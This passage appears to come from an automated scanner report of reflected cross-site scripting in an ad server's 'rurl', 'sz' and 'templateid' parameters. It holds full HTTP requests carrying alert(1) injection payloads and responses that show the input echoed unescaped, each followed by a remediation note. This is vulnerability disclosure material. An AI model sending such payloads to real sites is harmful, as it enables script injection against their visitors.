id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7201 Cache-Control: no-cache Pragma: no-cache Date: Fri, 26 Nov 2010 20:47:16 GMT Expires: Fri, 26 Nov 2010 20:47:16 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting ...[SNIP]... g%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecomd42f2"-alert(1)-"5cae220f39b&rurl="; var dcadvurl = escape(advurl); var dcminversion = 9; var dccreativewidth = "728"; var dccreativeheight = "90"; var dcwmode = "opaque"; var dcbgcolor = ""; var dcallowscriptaccess = "never";
The value of the rurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 598f2"-alert(1)-"3a0419b7fbb was submitted in the rurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=598f2"-alert(1)-"3a0419b7fbb HTTP/1.1 Host: ad.vulnerable.ad.partner Proxy-Connection: keep-alive Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7189 Cache-Control: no-cache Pragma: no-cache Date: Fri, 26 Nov 2010 20:47:19 GMT Expires: Fri, 26 Nov 2010 20:47:19 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting ...[SNIP]... 954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=598f2"-alert(1)-"3a0419b7fbb"; var dcadvurl = escape(advurl); var dcminversion = 9; var dccreativewidth = "728"; var dccreativeheight = "90"; var dcwmode = "opaque"; var dcbgcolor = ""; var dcallowscriptaccess = "never";
The value of the rurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49c83'-alert(1)-'284d4227519 was submitted in the rurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=49c83'-alert(1)-'284d4227519 HTTP/1.1 Host: ad.vulnerable.ad.partner Proxy-Connection: keep-alive Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7189 Cache-Control: no-cache Pragma: no-cache Date: Fri, 26 Nov 2010 20:47:20 GMT Expires: Fri, 26 Nov 2010 20:47:20 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting ...[SNIP]... 954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=49c83'-alert(1)-'284d4227519http://www.overstock.com"> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8bbda"-alert(1)-"a1a576feacd was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|28bbda"-alert(1)-"a1a576feacd&pnid=0&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=;ord=[timestamp]? HTTP/1.1 Host: ad.vulnerable.ad.partner Proxy-Connection: keep-alive Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7201 Cache-Control: no-cache Pragma: no-cache Date: Fri, 26 Nov 2010 20:46:59 GMT Expires: Fri, 26 Nov 2010 20:46:59 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting ...[SNIP]... ubleclick.net/click%3Bh%3Dv8/3a5e/f/391/%2a/f%3B231400901%3B0-0%3B0%3B55549399%3B3454-728/90%3B38954104/38971861/1%3B%3B%7Esscs%3D%3fhttp://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|28bbda"-alert(1)-"a1a576feacd&pnid=0&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26va ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd1a3'-alert(1)-'c324d152421 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2bd1a3'-alert(1)-'c324d152421&pnid=0&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=;ord=[timestamp]? HTTP/1.1 Host: ad.vulnerable.ad.partner Proxy-Connection: keep-alive Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7201 Cache-Control: no-cache Pragma: no-cache Date: Fri, 26 Nov 2010 20:46:59 GMT Expires: Fri, 26 Nov 2010 20:46:59 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting ...[SNIP]... ubleclick.net/click%3Bh%3Dv8/3a5e/f/391/%2a/f%3B231400901%3B0-0%3B0%3B55549399%3B3454-728/90%3B38954104/38971861/1%3B%3B%7Esscs%3D%3fhttp://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2bd1a3'-alert(1)-'c324d152421&pnid=0&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26va ...[SNIP]...
The value of the templateid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b7bb"-alert(1)-"de86702b0d5 was submitted in the templateid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920&templateid=12782641469b7bb"-alert(1)-"de86702b0d5&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=;ord=[timestamp]? HTTP/1.1 Host: ad.vulnerable.ad.partner Proxy-Connection: keep-alive Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7201 Cache-Control: no-cache Pragma: no-cache Date: Fri, 26 Nov 2010 20:47:08 GMT Expires: Fri, 26 Nov 2010 20:47:08 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting ...[SNIP]... B0%3B55549399%3B3454-728/90%3B38954104/38971861/1%3B%3B%7Esscs%3D%3fhttp://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920&templateid=12782641469b7bb"-alert(1)-"de86702b0d5&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab% ...[SNIP]...
The value of the templateid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16802'-alert(1)-'dda5ef572d6 was submitted in the templateid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920&templateid=127826414616802'-alert(1)-'dda5ef572d6&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=;ord=[timestamp]? HTTP/1.1 Host: ad.vulnerable.ad.partner Proxy-Connection: keep-alive Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7201 Cache-Control: no-cache Pragma: no-cache Date: Fri, 26 Nov 2010 20:47:09 GMT Expires: Fri, 26 Nov 2010 20:47:09 GMT
